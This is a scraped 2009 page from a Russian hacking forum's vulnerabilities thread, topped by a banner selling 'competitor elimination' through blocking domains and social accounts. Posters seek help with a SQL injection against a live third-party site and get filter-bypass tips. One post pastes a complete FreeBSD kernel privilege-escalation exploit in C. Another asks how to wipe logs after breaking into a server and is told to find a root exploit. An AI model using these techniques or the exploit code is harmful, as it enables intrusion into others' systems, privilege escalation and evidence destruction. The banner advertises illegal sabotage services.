УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 903 из 2438

903

Опции темы

Поиск в этой теме

Опции просмотра

#9021

18.09.2009, 16:06

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

перезапустить апач нужно

#9022

18.09.2009, 16:30

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

Цитата:

Сообщение от Велемир

_http://www.xakep.ru/post/49508/default.asp

В самом начале про протокол DATA.У кого-нибудь это работает? У меня даже такой директивы в php.ini allow_url_include нету.После того,как прописал,тоже ничего не изменилось.

Цитата:

(php>=5.2.0 - именно с этой версии включена поддержка data и других протоколов)

...

#9023

18.09.2009, 16:33

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от BlackSun

...

Да ему поxуй вообще, он по 10% читает.

__________________
..

#9024

19.09.2009, 10:57

Train

Новичок

Регистрация: 09.01.2009

Сообщений: 21

Провел на форуме:
195619

Репутация: 10

Здравствуйте уважаемые Гуру, у меня возник один сложный для меня, но возможно вполне простой для вас вопрос

Цитата:

http://site.ru/news/19/08/2009/603-1/

Гребаные ЧПУ, ненавижу их, но суть не в этом. С -1 все правильно работает, т.е. инъекция есть. если поставить /news/19/08/2009/603+--/ ругается на + страшными словами(если без + то все ровно):
Incorrect syntax near '+'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '+'.
Source Error:

Line 144: SqlDataAdapter adp = new SqlDataAdapter(q, myConn);
Line 145: dt = new DataTable();
Line 146: adp.Fill(dt);
Line 147: myConn.Close();
Line 148: break;
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
С MSsql я, скажем так, знаком только отдаленно(кстати не факт что mssql), но мануалы читал, однако что-то в голову никаких мыслей не пришло, единственное что опытным путем удалось установить что этот параметр в запросе самый последний после 603 идет ;
Кстати если вместо + в предыдущем запросе поставить пробел ругается абсолютно точно также. Если /news/19/08/2009/603;--/ то ругается Incorrect syntax near 'b'. Нужен ваш совет что делать дальше, какие конструкции попробовать, устроил бы даже посимвольный перебор содержимого БД.

#9025

19.09.2009, 11:08

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Вместо плюса используй:

Код:

 (пробел)
/**/
%09
%0A
%0D

Последний раз редактировалось mailbrush; 19.09.2009 в 11:10..

#9026

19.09.2009, 11:11

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

Отправить сообщение для LokbatanLi с помощью ICQ

a kakie bugi v dle scripte pojalusta??

#9027

19.09.2009, 11:14

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

http://forum.antichat.ru/thread52195.html

#9028

19.09.2009, 11:27

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

Может не в ту тему я попал, извиняйте меня

Кто может скомпилировать ?

Код:

/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here: 
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will 
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0. 
*
* Enjoy, and happy holidays!
*  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
    struct proc * p = (struct proc * )PATTERN1;
    uint * i;

    while(1)
    {
        if(p->p_pid == PATTERN2)
        {
            i = (uint * )p->p_ucred;
            *++i = 0;
            break;
        }

        p = p->p_list.le_next;
    }

    return 1;
}

int
main(int argc, char * argv[])
{
    ulong addr;
    uchar * c;
    uchar * d;
    uint * i;
    void * v;
    int pid;
    int s;

    if(argc != 2)
    {
        fprintf(stderr, "usage: ./x <allproc>\n");
        return 1;
    }

    addr = strtoul(argv[1], 0, 0);

    v = mmap(
        NULL,
        (PAGES*PAGE_SIZE),
        PROT_READ|PROT_WRITE|PROT_EXEC, 
        MAP_ANON|MAP_FIXED, 
        -1, 
        0);
    if(v == MAP_FAILED)
    {
        perror("mmap");
        return 0;
    }

    c = v;
    d = (uchar * )x;
    while(1)
    {
        *c = *d;
        if(*d == 0xc3)
        {
            break;
        }

        d++;
        c++;
    }

    *c++ = 0xc3;

    c = v;
    while(1)
    {
        if(*(long * )c == PATTERN1)
        {
            *(c + 0) = addr >>  0;
            *(c + 1) = addr >>  8;
            *(c + 2) = addr >> 16;
            *(c + 3) = addr >> 24;
            break;
        }
        c++;
    }

    pid = getpid();
    while(1)
    {
        if(*(long * )c == PATTERN2)
        {
            *(c + 0) = pid >>  0;
            *(c + 1) = pid >>  8;
            *(c + 2) = pid >> 16;
            *(c + 3) = pid >> 24;
            break;
        }
        c++;
    }

    s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
    if(s < 0)
    {
        perror("socket");
        return 1;
    }

    shutdown(s, SHUT_RDWR);

    return 0;
}

А то у меня не получается

Последний раз редактировалось SeNaP; 19.09.2009 в 11:30..

#9029

19.09.2009, 15:36

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

Провел на форуме:
791766

Репутация: 61

Код:

uid=1000(web) gid=1000(web) groups=1000(web

У меня достаточно прав для чистки логов?
Если да то что за собой нужно чистить?

#9030

19.09.2009, 16:03

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

Цитата:

Сообщение от Byrger

Код:

uid=1000(web) gid=1000(web) groups=1000(web

У меня достаточно прав для чистки логов?
Если да то что за собой нужно чистить?

Не не хватит, тебе нужны прова рута, дя чтение и записи файлов
Ищи сплойт для подняите прав

Последний раз редактировалось SeNaP; 19.09.2009 в 16:11..

Страница 903 из 2438

903

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 13 (пользователей: 0 , гостей: 13)

Быстрый переход